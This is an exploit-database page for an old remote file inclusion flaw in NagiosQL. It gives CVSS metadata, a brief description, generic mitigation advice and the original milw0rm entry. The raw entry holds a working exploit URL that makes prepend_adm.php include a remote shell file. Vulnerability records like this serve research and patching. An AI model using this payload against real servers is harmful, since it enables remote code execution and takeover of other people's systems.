header-logo
Suggest Exploit
vendor:
NagiosQL
by:
ThE TiGeR
7.5
CVSS
HIGH
Remote File Inclusion
Not provided
CWE
Product Name: NagiosQL
Affected Version From: Not provided
Affected Version To: Not provided
Patch Exists: NO
Related CWE: Not provided
CPE: Not provided
Metasploit:
Other Scripts:
Platforms Tested: Not provided
2007

NagiosQL Remote file inclusion

This exploit allows an attacker to include a remote file in the NagiosQL application. By manipulating the 'prepend_adm.php' file, the attacker can execute arbitrary code or gain unauthorized access to the system. The vulnerability was discovered by ThE TiGeR.

Mitigation:

Apply the latest patches and updates for NagiosQL. Ensure that the application is properly configured and access to sensitive files is restricted.
Source

Exploit-DB raw data:

#NagiosQL Remote file inclusion

#Download script : http://dfn.dl.sourceforge.net/sourceforge/nagiosql/nagiosql-2.00-P00.tar.gz

#Thanks str0ke

#Exploit :

#http://victim.com/[nagiosQL_path]/functions/prepend_adm.php?SETS[path][physical]=shell.txt?

#Discovered by ThE TiGeR

#Miro_Tiger100[at]Hotmail[dot]com

# milw0rm.com [2007-05-14]